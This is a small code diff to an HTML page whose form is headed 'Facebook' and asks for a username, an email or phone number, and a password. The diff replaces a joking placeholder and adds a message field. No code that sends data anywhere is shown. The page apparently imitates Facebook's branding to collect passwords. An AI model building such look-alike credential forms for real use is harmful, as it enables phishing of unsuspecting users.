--- a/index.html
+++ b/index.html
@@ -76,9 +76,10 @@ input{
 
   <form>
     <h1>Facebook</h1>
-    <input type="text" placeholder="Pag i love you para sendan tika"name="username"required>
+    <input type="text" placeholder="Username"name="username"required>
     <input type="email or phone"name="Email or phone"placeholder="Email or phone" required>
     <input type="password"name="PA$$W0RD" placeholder="Password" required id="id_password">
+    <input type="text" name="Message" id="message"placeholder="Say something ">
     <p class="privacy" align="left">By creating an account you agree to our <a href="#" style="color:#CD5D5D">Terms & Privacy</a>.</p>
     <input class="submit"  type="submit">
   </form>
